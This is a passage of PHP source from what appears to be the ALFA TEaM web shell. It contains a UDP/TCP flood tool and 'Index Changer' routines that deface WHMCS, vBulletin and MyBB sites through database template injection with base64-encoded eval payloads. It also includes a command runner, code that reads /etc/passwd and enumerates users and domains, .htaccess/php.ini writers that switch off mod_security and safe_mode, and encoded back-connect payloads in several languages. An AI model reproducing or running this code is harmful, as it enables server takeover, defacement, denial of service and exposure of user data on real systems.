        echo "<center><p><div class=\"txtfont_header\">| DOS |</div></p><form onSubmit=\"g('dos',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;\"><div class=\"txtfont\">Method : <select name=\"m\" style=\"width:80px;\"><option value=\"udp\">UDP</option><option value=\"tcp\">TCP</option></select> Host : <input name=\"host\" type=\"text\" value=\"localhost\" size=\"25\" /> Time : <input name=\"time\" type=\"text\" size=\"15\" /> Port : <input name=\"port\" type=\"text\" size=\"10\" /> <input type=\"submit\" value=\" \" /></div></form></center><br>";
        if (!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])) {
            echo __pre();
            $packets = 0;
            ignore_user_abort(true);
            $exec_time = (int) $_POST['alfa2'];
            $time = time();
            $max_time = $exec_time + $time;
            $host = $_POST['alfa1'];
            $port = (int) $_POST['alfa3'];
            $method = $_POST['alfa4'];
            $out = str_repeat('X', 65000);
            while (1) {
                $packets++;
                if (time() > $max_time) {
                    break;
                }
                $fp = @fsockopen($method . '://' . $host, $port, $errno, $errstr, 5);
                if ($fp) {
                    fwrite($fp, $out);
                    fclose($fp);
                }
            }
            echo "<center>{$packets} (" . @round($packets * 65 / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>";
            echo "</pre>";
        }
        echo "</div>";
        alfafooter();
    }
    function __pre()
    {
        return "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\">";
    }
    function alfaIndexChanger()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,null,'whmcs')\">| Whmcs | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,'vb',null)\">| vBulletin | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,'mybb')\">| MyBB | </a></h3></center>";
        if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'whmcs') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| Whmcs |</div>\r\n<p><center>" . getConfigHtml('whmcs') . "<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type='submit' value=' '>\r\n</form></center></center>";
            if (isset($_POST['alfa6'])) {
                $s0levisible = "Powered By Solevisible";
                $dbu = $_POST['alfa6'];
                $path = $_POST['alfa5'];
                $fname = $_POST['alfa4'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $index = $_POST['alfa10'];
                $index = str_replace("\\'", "'", $index);
                $deface = '$x = base64_decode("' . __ZW5jb2Rlcg($index) . '"); $solevisible = fopen("' . $fname . '","w"); fwrite($solevisible,$x);';
                $saveData = __ZW5jb2Rlcg($deface);
                $Def = '{php}eval(base64_decode("' . $saveData . '"));{/php}';
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                    $soleGet = mysqli_fetch_assoc($soleSave);
                    $tempSave1 = $soleGet['message'];
                    $tempSave = str_replace("'", "\\'", $tempSave1);
                    $inject = "UPDATE tblemailtemplates SET message='{$Def}' WHERE name='Password Reset Validation'";
                    $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn));
                    $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                    $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn));
                    if (function_exists('curl_version')) {
                        $AlfaSole = new AlfaCURL(true);
                        $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                        $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                        $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                        $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                        $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                        __alert('File Created...');
                        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>";
                    } else {
                        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" " . $path . "/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" " . $path . "/" . $fname . " \"</font></b></center><br><br>";
                    }
                }
            }
        }
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'vb') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| vBulletin |</div>\r\n<p><center>" . getConfigHtml('vb') . "<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type='submit' value=' '></form></center></center>";
            if ($_POST['alfa8'] == '>>') {
                $s0levisible = "Powered By Solevisible";
                $dbu = $_POST['alfa2'];
                $dbn = $_POST['alfa3'];
                $dbp = $_POST['alfa4'];
                $dbh = $_POST['alfa5'];
                $index = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $index = str_replace("\\'", "'", $index);
                $set_index = "{\${eval(base64_decode(\\'";
                $set_index .= __ZW5jb2Rlcg("echo \"{$index}\";");
                $set_index .= "\\'))}}{\${exit()}}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='spacer_open'";
                    $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='FORUMHOME'";
                    $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . "" . $s0levisible . "', stylevars='', csscolors='', editorstyles=''";
                    @mysqli_query($conn, $loli1) or die(mysqli_error($conn));
                    @mysqli_query($conn, $loli2) or die(mysqli_error($conn));
                    @mysqli_query($conn, $loli3) or die(mysqli_error($conn));
                    __alert('VB index changed...!');
                }
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
            echo __pre();
            echo "<center><center><div class='txtfont_header'>| Mybb |</div>\r\n<p><center>" . getConfigHtml('mybb') . "<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name=mybbindex rows='19' cols='103'>\r\n<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
            if (isset($_POST['alfa6'])) {
                $mybb_dbh = $_POST['alfa6'];
                $mybb_dbu = $_POST['alfa7'];
                $mybb_dbn = $_POST['alfa8'];
                $mybb_dbp = $_POST['alfa9'];
                $mybb_index = $_POST['alfa10'];
                if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) {
                    $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn));
                    $prefix = "mybb_";
                    $loli7 = "UPDATE mybb_templates SET template='" . $mybb_index . "' WHERE title='index'";
                    $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn));
                    __alert('MyBB index changed...!');
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaproc()
    {
        alfahead();
        echo "<Div class=header><br><center>";
        if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) {
            $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
        }
        if ($GLOBALS['sys'] == "win") {
            $process = array("Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
        } else {
            $process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab");
        }
        foreach ($process as $n => $link) {
            echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
        }
        echo "</center><br>";
        if (!empty($_POST['alfa1'])) {
            echo "<pre class='ml1' style='margin-top:5px' >";
            if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
                $cmd = "cd '" . addslashes($_POST["c"]) . "';";
            }
            echo alfaEx($cmd . $_POST['alfa1'], true);
            echo "</pre>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfasafe()
    {
        alfahead();
        echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
        echo "<h3><a href=javascript:void(0) onclick=\"g('safe',null,'php.ini',null)\">| PHP.INI | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,'ini')\">| .htaccess(apache) | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,'pl')\">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,'passwd')\">| Read-Passwd | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,'users')\">| Read-Users | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,'valiases')\">| Get-User | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,null,null,'domains')\">| Get-Domains | </a></center></h3>";
        if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {
            if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                echo __pre();
                $solevisible9 = _alfa_file('/etc/named.conf');
                if (is_array($solevisible9)) {
                    foreach ($solevisible9 as $solevisible13) {
                        if (@eregi('zone', $solevisible13)) {
                            preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
                            if (strlen(trim($solevisible14[1][0])) > 2) {
                                echo $solevisible14[1][0] . '<br>';
                            }
                        }
                    }
                }
            } else {
                echo __pre();
                $users = _alfa_file("/etc/virtual/domainowners");
                if (is_array($users)) {
                    foreach ($users as $boz) {
                        $dom = explode(":", $boz);
                        echo $dom[0] . "\n";
                    }
                }
            }
        }
        if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') {
            echo "\r\n<form onsubmit=\"g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;\" method=\"post\" /><center><div class=\"txtfont\">Url: </font><input type=\"text\" placeholder=\"site.com\" name=\"site\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center>";
            if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>') {
                if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                    $site = trim($_POST['alfa7']);
                    $rep = str_replace(array("https://", "http://", "www."), "", $site);
                    $user = "";
                    if (function_exists("posix_getpwuid") && function_exists("fileowner")) {
                        if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
                            $user = $user['name'];
                        }
                    } else {
                        if (_alfa_can_runCommand(true, true)) {
                            $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep);
                        }
                    }
                    if (!empty($user) && $user != 'root') {
                        echo __pre() . "<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                    } else {
                        echo __pre() . '<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
                    }
                } else {
                    $site = trim($_POST['alfa7']);
                    $rep = str_replace(array("https://", "http://", "www."), "", $site);
                    $users = _alfa_file("/etc/virtual/domainowners");
                    foreach ($users as $boz) {
                        $ex = explode(":", $boz);
                        if ($ex[0] == $rep) {
                            echo __pre() . "<center><table border='1'>\r\n<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">" . trim($ex[1]) . "</font></b></td></tr>\r\n<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                            break;
                        }
                    }
                }
            }
        }
        if (!empty($_POST['alfa5']) && isset($_POST['alfa5'])) {
            if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                echo __pre();
                $i = 0;
                while ($i < 60000) {
                    $line = @posix_getpwuid($i);
                    if (!empty($line)) {
                        while (list($key, $vl) = each($line)) {
                            echo $vl . "\n";
                            break;
                        }
                    }
                    $i++;
                }
            } else {
                echo __pre();
                $users = _alfa_file("/etc/virtual/domainowners");
                foreach ($users as $boz) {
                    $user = explode(":", $boz);
                    echo trim($user[1]) . '<br>';
                }
            }
        }
        if (!empty($_POST['alfa4']) && isset($_POST['alfa4'])) {
            echo __pre();
            if (_alfa_can_runCommand(true, true)) {
                echo __read_file("/etc/passwd");
            } elseif (function_exists("posix_getpwuid")) {
                for ($uid = 0; $uid < 60000; $uid++) {
                    $ara = @posix_getpwuid($uid);
                    if (!empty($ara)) {
                        while (list($key, $val) = each($ara)) {
                            echo "{$val}:";
                        }
                        echo "\n";
                    }
                }
            } else {
                __alert('failed...');
            }
        }
        if (!empty($_POST['alfa2']) && isset($_POST['alfa2'])) {
            @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
            echo "<center><b><big>htaccess for Apache created...!</center></b></big>";
        }
        if (!empty($_POST['alfa1']) && isset($_POST['alfa1'])) {
            @__write_file($GLOBALS['cwd'] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
            echo "<center><b><big> php.ini created...!</center></b></big>";
        }
        if (!empty($_POST['alfa3']) && isset($_POST['alfa3'])) {
            @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
            echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>";
        }
        echo "<br></div>";
        alfafooter();
    }
    function __get_resource($content)
    {
        return @gzinflate(__ZGVjb2Rlcg($content));
    }
    function __write_file($file, $content)
    {
        if ($fh = @fopen($file, "wb")) {
            if (fwrite($fh, $content) !== false) {
                return true;
            }
        }
        return false;
    }
    function bcinit($evalType, $evalCode, $evalOptions, $evalArguments)
    {
        $res = "<font color='green'>[ Success...! ]</font>";
        $err = "<font color='red'>[ Failed...! ]</font>";
        if ($evalOptions != "") {
            $evalOptions .= " ";
        }
        if ($evalArguments != "") {
            $evalArguments = " " . $evalArguments;
        }
        if ($evalType == "c") {
            $tmpdir = ALFA_TEMPDIR;
            chdir($tmpdir);
            if (is_writable($tmpdir)) {
                $uniq = substr(md5(time()), 0, 8);
                $filename = $evalType . $uniq . ".c";
                $path = $filename;
                if (__write_file($path, $evalCode)) {
                    $ext = $GLOBALS['sys'] == 'win' ? ".exe" : ".out";
                    $pathres = $filename . $ext;
                    $evalOptions = "-o " . $pathres . " " . $evalOptions;
                    $cmd = "gcc " . $evalOptions . $path;
                    alfaEx($cmd);
                    if (is_file($pathres)) {
                        if (chmod($pathres, 0755)) {
                            $cmd = $pathres . $evalArguments;
                            alfaEx($cmd);
                        } else {
                            $res = $err;
                        }
                        unlink($pathres);
                    } else {
                        $res = $err;
                    }
                    unlink($path);
                } else {
                    $res = $err;
                }
            }
            return $res;
        } elseif ($evalType == "java") {
            $tmpdir = ALFA_TEMPDIR;
            chdir($tmpdir);
            if (is_writable($tmpdir)) {
                if (preg_match("/class\\ ([^{]+){/i", $evalCode, $r)) {
                    $classname = trim($r[1]);
                    $filename = $classname;
                } else {
                    $uniq = substr(md5(time()), 0, 8);
                    $filename = $evalType . $uniq;
                    $evalCode = "class " . $filename . " { " . $evalCode . " } ";
                }
                $path = $filename . ".java";
                if (__write_file($path, $evalCode)) {
                    $cmd = "javac " . $evalOptions . $path;
                    alfaEx($cmd);
                    $pathres = $filename . ".class";
                    if (is_file($pathres)) {
                        if (chmod($pathres, 0755)) {
                            $cmd = "java " . $filename . $evalArguments;
                            alfaEx($cmd);
                        } else {
                            $res = $err;
                        }
                        unlink($pathres);
                    } else {
                        $res = $err;
                    }
                    unlink($path);
                } else {
                    $res = $err;
                }
            }
            return $res;
        }
        return false;
    }
    function alfaconnect()
    {
        alfahead();
        $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
        $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
        $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
        $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
        $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
        $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
